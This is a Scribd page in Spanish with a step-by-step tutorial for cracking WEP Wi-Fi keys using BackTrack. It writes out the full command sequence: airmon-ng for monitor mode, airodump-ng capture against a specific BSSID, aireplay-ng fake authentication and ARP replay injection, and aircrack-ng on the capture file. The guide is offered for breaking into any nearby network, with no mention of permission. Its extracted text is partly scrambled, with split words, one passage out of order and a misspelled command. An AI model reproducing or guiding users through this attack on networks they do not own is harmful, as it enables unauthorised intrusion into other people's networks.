0% encontró este documento útil (0 votos)
39 vistas2 páginas

Back

Este documento describe los pasos para crackear una clave WEP utilizando BackTrack y las herramientas aireplay-ng y aircrack-ng. Primero se pone la interfaz inalámbrica en modo monitor y se escanean las redes disponibles. Luego se capturan paquetes de una red específica y se descifra la clave WEP.

Cargado por

roy20maya
Derechos de autor
© Attribution Non-Commercial (BY-NC)
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como TXT, PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
39 vistas2 páginas

Back

Este documento describe los pasos para crackear una clave WEP utilizando BackTrack y las herramientas aireplay-ng y aircrack-ng. Primero se pone la interfaz inalámbrica en modo monitor y se escanean las redes disponibles. Luego se capturan paquetes de una red específica y se descifra la clave WEP.

Cargado por

roy20maya
Derechos de autor
© Attribution Non-Commercial (BY-NC)
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como TXT, PDF, TXT o lee en línea desde Scribd

Crackear claves wep Descargar BackTrack http://www.backtrack-linux.

org/downloads/ (En lo particu lar prefiero la versin GNOME) y quemarlo en un DVD Insertamos el DVD y arrancamos nuestra pc desde la unidad de CD/DVD Nos aparecer de la siguiente manera (En la versin BackTrack5 GNOME-32 aunque no varia en las otras) y seleccionamos BackTrack Debug Safe Mode, esto para evitar algunos problemas. Despues escribimos el comando startx Esto iniciara la interface grafica. Bueno comencemos. Lo primero es saber el nombre de nuestra interface (tarjeta wireless) para poner la en modo monitor, asi que abrimos una terminal dando clic en el icono negro (I magen anterior) Escribimos el comando airmon-ng Ya que conocemos nuestra interface la ponemos en modo monitor airmon-ng start No mbre_de_nuestra_ interface en este caso es wlan0 (variar dependiendo del fabrica nte de su tarjeta) as que quedara: airmon-ng start wlan0 Ya tenemos nuestra interface en modo monitor (monitor Para verificar que esto es cierto podemos escribir el aecera de la siguiente manera Interface Chipset Driver wlan0 Broadcom b43 [phy0] mon0 Broadcom b43 [phy0] mon0 es la interface en modo monitor. Vamos a escanear las redes disponibles con el comando _monitor Quedara asi airodump-ng mon0 y comenzara a mostarnos mode enabled on mon0) comando airmon-ng y nos ap

airodump-ng interface_modo las redes disponibles.

Detenemos el escaneo Ctrl+C Escogemosuna red y anotamos los siguientes dato el BSSID y CH (canal del punto d e acceso) Siguiente comando airodump-ng -w redes -c 4 --bssid 00:1F:B3:85:89:D1 mon0 Donde -w especifica que se va a guardar un archivo -c canal del punto de acceso --bssid mac del punto de acceso mon0 interface en modo monitor Nos aparecer algo asi Abrimos una segunda terminal y escribimos el sig. Comando aireplay-ng -1 0 -a 00 :1F:B3:85:89:D1 mon0 Abrimos una tercera terminal y el siguiente comando aireplay-ng -3 -b mac_punto_ de_acceso interface Quedara asi: aireplay-ng -3 -b 00:1F:B3:85:89:D1 mon0 con el cual enviaremos y recibiremos paquetes Vamos a la primera terminal y en la columna #Data se incrementara rpidamente, es peramos a que llegue a los 30,000 datos para poder descifrar la clave. Cuando te ngamos los suficientes datos presionamos Ctrl+C en la tercera y primera terminal para detener el envio y captura de datos.

Abrimos una cuarta terminal y escribimos el comando dir esto nos mostrara los ar

chivos que se guardaron Nos aparecen varios archivos, el que nos interesa es el que tiene la extensin .ca p escribimos el comando aicrack-ng redes-01.cap y descifrara la clave.

También podría gustarte